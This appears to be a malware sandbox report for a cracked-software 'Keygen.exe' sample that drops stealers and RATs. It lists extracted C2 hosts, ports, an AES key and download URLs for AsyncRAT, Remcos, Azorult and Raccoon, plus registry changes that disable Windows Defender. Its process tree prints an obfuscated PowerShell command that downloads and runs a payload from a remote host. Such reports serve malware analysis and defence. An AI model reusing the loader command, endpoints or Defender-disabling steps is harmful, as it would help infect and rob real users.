Overview
overview
10Static
static
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
9ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
Analysis
-
max time kernel
1802s -
max time network
1815s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
20-11-2020 14:34
Static task
static1
Behavioral task
behavioral1
Sample
08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.exe.dll
Resource
win10v20201028
Behavioral task
behavioral2
Sample
0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
0di3x.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
2019-09-02_22-41-10.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
2c01b007729230c415420ad641ad92eb.exe
Resource
win10v20201028
Behavioral task
behavioral6
Sample
31.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
3DMark 11 Advanced Edition.exe
Resource
win10v20201028
Behavioral task
behavioral8
Sample
42f972925508a82236e8533567487761.exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
Resource
win10v20201028
Behavioral task
behavioral10
Sample
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe
Resource
win10v20201028
Behavioral task
behavioral12
Sample
948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.exe.dll
Resource
win10v20201028
Behavioral task
behavioral14
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.exe
Resource
win10v20201028
Behavioral task
behavioral15
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral16
Sample
DiskInternals_Uneraser_v5_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral17
Sample
ForceOp 2.8.7 - By RaiSence.exe
Resource
win10v20201028
Behavioral task
behavioral18
Sample
HYDRA.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
KLwC6vii.exe
Resource
win10v20201028
Behavioral task
behavioral20
Sample
Keygen.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
Lonelyscreen.1.2.9.keygen.by.Paradox.exe
Resource
win10v20201028
Behavioral task
behavioral22
Sample
LtHv0O2KZDK4M637.exe
Resource
win10v20201028
Behavioral task
behavioral23
Sample
Magic_File_v3_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral24
Sample
OnlineInstaller.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral27
Sample
SecuriteInfo.com.Generic.mg.cde56cf0169830ee.29869.dll
Resource
win10v20201028
Behavioral task
behavioral28
Sample
SecurityTaskManager_Setup.exe
Resource
win10v20201028
Behavioral task
behavioral29
Sample
Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
Resource
win10v20201028
Behavioral task
behavioral30
Sample
VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral31
Sample
WSHSetup[1].exe
Resource
win10v20201028
Behavioral task
behavioral32
Sample
Yard.dll
Resource
win10v20201028
General
Malware Config
Extracted
http://bit.do/fqhHT
http://bit.do/fqhHT
Extracted
http://zxvbcrt.ug/zxcvb.exe
http://zxvbcrt.ug/zxcvb.exe
Extracted
http://bit.do/fqhJv
http://bit.do/fqhJv
Extracted
http://pdshcjvnv.ug/zxcvb.exe
http://pdshcjvnv.ug/zxcvb.exe
Extracted
http://bit.do/fqhJD
http://bit.do/fqhJD
Extracted
http://rbcxvnb.ug/zxcvb.exe
http://rbcxvnb.ug/zxcvb.exe
Extracted
raccoon
5e4db353b88c002ba6466c06437973619aad03b3
-
url4cnc
https://telete.in/brikitiki
Extracted
azorult
http://195.245.112.115/index.php
Extracted
asyncrat
0.5.7B
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
AsyncMutex_6SI8OkPnk
-
aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
agentttt.ac.ug,agentpurple.ac.ug
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6970
-
version
0.5.7B
Extracted
remcos
2.7.2 Light
xxxxxxxxxxx
taenaia.ac.ug:6969
agentpapple.ac.ug:6969
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
cvxdsaxzcas-FPRVUD
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
wikipedia;solitaire;
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 10 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral20/memory/4076-226-0x0000000000400000-0x000000000040C000-memory.dmp disable_win_def behavioral20/memory/4076-227-0x000000000040616E-mapping.dmp disable_win_def behavioral20/files/0x000300000001abb6-247.dat disable_win_def behavioral20/files/0x000300000001abb6-248.dat disable_win_def behavioral20/memory/5420-303-0x0000000000400000-0x0000000000408000-memory.dmp disable_win_def behavioral20/memory/5420-304-0x0000000000403BEE-mapping.dmp disable_win_def behavioral20/memory/5232-668-0x000000000040616E-mapping.dmp disable_win_def behavioral20/memory/5768-669-0x0000000000403BEE-mapping.dmp disable_win_def behavioral20/files/0x000400000001abd3-768.dat disable_win_def behavioral20/files/0x000400000001abd3-767.dat disable_win_def -
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Raccoon Stealer Payload 2 IoCs
resource yara_rule behavioral20/memory/3936-144-0x0000000000400000-0x0000000000497000-memory.dmp family_raccoon behavioral20/memory/5840-330-0x000000000043FA56-mapping.dmp family_raccoon -
Async RAT payload 3 IoCs
resource yara_rule behavioral20/memory/4436-217-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral20/memory/4436-218-0x000000000040C76E-mapping.dmp asyncrat behavioral20/memory/2800-641-0x000000000040C76E-mapping.dmp asyncrat -
ModiLoader First Stage 2 IoCs
resource yara_rule behavioral20/memory/4968-264-0x00000000041C0000-0x000000000421C000-memory.dmp modiloader_stage1 behavioral20/memory/2528-645-0x0000000002A70000-0x0000000002ACC000-memory.dmp modiloader_stage1 -
Blocklisted process makes network request 6 IoCs
flow pid Process 10 4520 powershell.exe 14 500 powershell.exe 15 4520 powershell.exe 17 500 powershell.exe 18 4604 powershell.exe 20 4604 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 34 IoCs
pid Process 724 Keygen.exe 3964 odx.exe 4660 jui.exe 4564 jev.exe 3740 FGbfttrev.exe 3276 FDvbcgfert.exe 3936 jui.exe 3180 FGbfttrev.exe 3036 FDvbcgfert.exe 2488 y6eLz6oSft.exe 4968 cnThYCQFnu.exe 3748 kw3aCw7M67.exe 2808 YbZiyFsdYL.exe 2304 y6eLz6oSft.exe 4436 y6eLz6oSft.exe 4076 kw3aCw7M67.exe 428 f1xl0ksx.exe 5420 YbZiyFsdYL.exe 5828 azchgftrq.exe 5840 odx.exe 2568 WxzzZNQHI3.exe 2528 cLK6vDADey.exe 5804 UrXJ4xouC3.exe 5284 ZSZAUJV5RA.exe 5400 ozchgftrq.exe 3500 azchgftrq.exe 1804 azchgftrq.exe 2800 WxzzZNQHI3.exe 1324 UrXJ4xouC3.exe 5172 ZSZAUJV5RA.exe 5232 UrXJ4xouC3.exe 5768 ZSZAUJV5RA.exe 4380 ozchgftrq.exe 4524 mgovv5kp.exe -
Loads dropped DLL 18 IoCs
pid Process 3936 jui.exe 3936 jui.exe 3936 jui.exe 3936 jui.exe 3936 jui.exe 3936 jui.exe 3036 FDvbcgfert.exe 3036 FDvbcgfert.exe 3036 FDvbcgfert.exe 5840 odx.exe 5840 odx.exe 5840 odx.exe 5840 odx.exe 5840 odx.exe 5840 odx.exe 4380 ozchgftrq.exe 4380 ozchgftrq.exe 4380 ozchgftrq.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features YbZiyFsdYL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" YbZiyFsdYL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ZSZAUJV5RA.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zsle = "C:\\Users\\Admin\\AppData\\Local\\elsZ.url" cnThYCQFnu.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini jui.exe File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini odx.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 3936 jui.exe 3936 jui.exe 3180 FGbfttrev.exe 3180 FGbfttrev.exe 3036 FDvbcgfert.exe 3036 FDvbcgfert.exe -
Suspicious use of SetThreadContext 14 IoCs
description pid Process procid_target PID 4660 set thread context of 3936 4660 jui.exe 104 PID 3740 set thread context of 3180 3740 FGbfttrev.exe 105 PID 3276 set thread context of 3036 3276 FDvbcgfert.exe 106 PID 2488 set thread context of 4436 2488 y6eLz6oSft.exe 123 PID 3748 set thread context of 4076 3748 kw3aCw7M67.exe 124 PID 2808 set thread context of 5420 2808 YbZiyFsdYL.exe 159 PID 3964 set thread context of 5840 3964 odx.exe 163 PID 5828 set thread context of 1804 5828 azchgftrq.exe 174 PID 2568 set thread context of 2800 2568 WxzzZNQHI3.exe 176 PID 5804 set thread context of 5232 5804 UrXJ4xouC3.exe 179 PID 5284 set thread context of 5768 5284 ZSZAUJV5RA.exe 180 PID 5400 set thread context of 4380 5400 ozchgftrq.exe 184 PID 4968 set thread context of 5044 4968 cnThYCQFnu.exe 187 PID 2528 set thread context of 3560 2528 cLK6vDADey.exe 202 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FDvbcgfert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ozchgftrq.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 3812 timeout.exe 1180 timeout.exe 1076 timeout.exe 3856 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 1896 taskkill.exe 4788 taskkill.exe 5008 taskkill.exe 3532 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings cmd.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 cnThYCQFnu.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e cnThYCQFnu.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 500 powershell.exe 500 powershell.exe 564 powershell.exe 564 powershell.exe 4520 powershell.exe 4520 powershell.exe 1064 powershell.exe 1064 powershell.exe 564 powershell.exe 500 powershell.exe 4520 powershell.exe 1064 powershell.exe 1064 powershell.exe 500 powershell.exe 4520 powershell.exe 564 powershell.exe 4604 powershell.exe 4604 powershell.exe 4604 powershell.exe 1044 powershell.exe 1044 powershell.exe 4604 powershell.exe 1044 powershell.exe 1044 powershell.exe 2488 y6eLz6oSft.exe 2488 y6eLz6oSft.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4660 jui.exe 3740 FGbfttrev.exe 3276 FDvbcgfert.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 500 powershell.exe Token: SeDebugPrivilege 564 powershell.exe Token: SeDebugPrivilege 4520 powershell.exe Token: SeDebugPrivilege 1064 powershell.exe Token: SeDebugPrivilege 4604 powershell.exe Token: SeDebugPrivilege 1044 powershell.exe Token: SeDebugPrivilege 1896 taskkill.exe Token: SeDebugPrivilege 2488 y6eLz6oSft.exe Token: SeDebugPrivilege 3748 kw3aCw7M67.exe Token: SeDebugPrivilege 4076 kw3aCw7M67.exe Token: SeDebugPrivilege 4788 taskkill.exe Token: SeDebugPrivilege 4728 powershell.exe Token: SeIncreaseQuotaPrivilege 4728 powershell.exe Token: SeSecurityPrivilege 4728 powershell.exe Token: SeTakeOwnershipPrivilege 4728 powershell.exe Token: SeLoadDriverPrivilege 4728 powershell.exe Token: SeSystemProfilePrivilege 4728 powershell.exe Token: SeSystemtimePrivilege 4728 powershell.exe Token: SeProfSingleProcessPrivilege 4728 powershell.exe Token: SeIncBasePriorityPrivilege 4728 powershell.exe Token: SeCreatePagefilePrivilege 4728 powershell.exe Token: SeBackupPrivilege 4728 powershell.exe Token: SeRestorePrivilege 4728 powershell.exe Token: SeShutdownPrivilege 4728 powershell.exe Token: SeDebugPrivilege 4728 powershell.exe Token: SeSystemEnvironmentPrivilege 4728 powershell.exe Token: SeRemoteShutdownPrivilege 4728 powershell.exe Token: SeUndockPrivilege 4728 powershell.exe Token: SeManageVolumePrivilege 4728 powershell.exe Token: 33 4728 powershell.exe Token: 34 4728 powershell.exe Token: 35 4728 powershell.exe Token: 36 4728 powershell.exe Token: SeDebugPrivilege 2348 powershell.exe Token: SeDebugPrivilege 4752 powershell.exe Token: SeDebugPrivilege 1172 powershell.exe Token: SeDebugPrivilege 2200 powershell.exe Token: SeDebugPrivilege 3136 powershell.exe Token: SeDebugPrivilege 2008 powershell.exe Token: SeDebugPrivilege 3416 powershell.exe Token: SeDebugPrivilege 4396 powershell.exe Token: SeDebugPrivilege 1392 powershell.exe Token: SeIncreaseQuotaPrivilege 2348 powershell.exe Token: SeSecurityPrivilege 2348 powershell.exe Token: SeTakeOwnershipPrivilege 2348 powershell.exe Token: SeLoadDriverPrivilege 2348 powershell.exe Token: SeSystemProfilePrivilege 2348 powershell.exe Token: SeSystemtimePrivilege 2348 powershell.exe Token: SeProfSingleProcessPrivilege 2348 powershell.exe Token: SeIncBasePriorityPrivilege 2348 powershell.exe Token: SeCreatePagefilePrivilege 2348 powershell.exe Token: SeBackupPrivilege 2348 powershell.exe Token: SeRestorePrivilege 2348 powershell.exe Token: SeShutdownPrivilege 2348 powershell.exe Token: SeDebugPrivilege 2348 powershell.exe Token: SeSystemEnvironmentPrivilege 2348 powershell.exe Token: SeRemoteShutdownPrivilege 2348 powershell.exe Token: SeUndockPrivilege 2348 powershell.exe Token: SeManageVolumePrivilege 2348 powershell.exe Token: 33 2348 powershell.exe Token: 34 2348 powershell.exe Token: 35 2348 powershell.exe Token: 36 2348 powershell.exe Token: SeIncreaseQuotaPrivilege 2200 powershell.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 724 Keygen.exe 4660 jui.exe 4564 jev.exe 3276 FDvbcgfert.exe 3740 FGbfttrev.exe 4076 kw3aCw7M67.exe 4076 kw3aCw7M67.exe 5232 UrXJ4xouC3.exe 5232 UrXJ4xouC3.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4704 wrote to memory of 1840 4704 Keygen.exe 74 PID 4704 wrote to memory of 1840 4704 Keygen.exe 74 PID 4704 wrote to memory of 1840 4704 Keygen.exe 74 PID 1840 wrote to memory of 724 1840 cmd.exe 78 PID 1840 wrote to memory of 724 1840 cmd.exe 78 PID 1840 wrote to memory of 724 1840 cmd.exe 78 PID 1840 wrote to memory of 3224 1840 cmd.exe 79 PID 1840 wrote to memory of 3224 1840 cmd.exe 79 PID 1840 wrote to memory of 3224 1840 cmd.exe 79 PID 1840 wrote to memory of 4208 1840 cmd.exe 80 PID 1840 wrote to memory of 4208 1840 cmd.exe 80 PID 1840 wrote to memory of 4208 1840 cmd.exe 80 PID 1840 wrote to memory of 3812 1840 cmd.exe 81 PID 1840 wrote to memory of 3812 1840 cmd.exe 81 PID 1840 wrote to memory of 3812 1840 cmd.exe 81 PID 3224 wrote to memory of 500 3224 mshta.exe 82 PID 3224 wrote to memory of 500 3224 mshta.exe 82 PID 3224 wrote to memory of 500 3224 mshta.exe 82 PID 4208 wrote to memory of 564 4208 mshta.exe 83 PID 4208 wrote to memory of 564 4208 mshta.exe 83 PID 4208 wrote to memory of 564 4208 mshta.exe 83 PID 1840 wrote to memory of 4344 1840 cmd.exe 86 PID 1840 wrote to memory of 4344 1840 cmd.exe 86 PID 1840 wrote to memory of 4344 1840 cmd.exe 86 PID 1840 wrote to memory of 1764 1840 cmd.exe 87 PID 1840 wrote to memory of 1764 1840 cmd.exe 87 PID 1840 wrote to memory of 1764 1840 cmd.exe 87 PID 4344 wrote to memory of 4520 4344 mshta.exe 88 PID 4344 wrote to memory of 4520 4344 mshta.exe 88 PID 4344 wrote to memory of 4520 4344 mshta.exe 88 PID 1764 wrote to memory of 1064 1764 mshta.exe 90 PID 1764 wrote to memory of 1064 1764 mshta.exe 90 PID 1764 wrote to memory of 1064 1764 mshta.exe 90 PID 1840 wrote to memory of 1180 1840 cmd.exe 92 PID 1840 wrote to memory of 1180 1840 cmd.exe 92 PID 1840 wrote to memory of 1180 1840 cmd.exe 92 PID 1840 wrote to memory of 2308 1840 cmd.exe 93 PID 1840 wrote to memory of 2308 1840 cmd.exe 93 PID 1840 wrote to memory of 2308 1840 cmd.exe 93 PID 1840 wrote to memory of 1388 1840 cmd.exe 94 PID 1840 wrote to memory of 1388 1840 cmd.exe 94 PID 1840 wrote to memory of 1388 1840 cmd.exe 94 PID 2308 wrote to memory of 4604 2308 mshta.exe 95 PID 2308 wrote to memory of 4604 2308 mshta.exe 95 PID 2308 wrote to memory of 4604 2308 mshta.exe 95 PID 1388 wrote to memory of 1044 1388 mshta.exe 97 PID 1388 wrote to memory of 1044 1388 mshta.exe 97 PID 1388 wrote to memory of 1044 1388 mshta.exe 97 PID 4520 wrote to memory of 3964 4520 powershell.exe 99 PID 4520 wrote to memory of 3964 4520 powershell.exe 99 PID 4520 wrote to memory of 3964 4520 powershell.exe 99 PID 500 wrote to memory of 4660 500 powershell.exe 100 PID 500 wrote to memory of 4660 500 powershell.exe 100 PID 500 wrote to memory of 4660 500 powershell.exe 100 PID 4604 wrote to memory of 4564 4604 powershell.exe 101 PID 4604 wrote to memory of 4564 4604 powershell.exe 101 PID 4604 wrote to memory of 4564 4604 powershell.exe 101 PID 4660 wrote to memory of 3740 4660 jui.exe 102 PID 4660 wrote to memory of 3740 4660 jui.exe 102 PID 4660 wrote to memory of 3740 4660 jui.exe 102 PID 4660 wrote to memory of 3276 4660 jui.exe 103 PID 4660 wrote to memory of 3276 4660 jui.exe 103 PID 4660 wrote to memory of 3276 4660 jui.exe 103 PID 4660 wrote to memory of 3936 4660 jui.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7361.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Users\Admin\AppData\Local\Temp\7361.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:724
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7361.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:500 -
C:\Users\Public\jui.exe"C:\Users\Public\jui.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
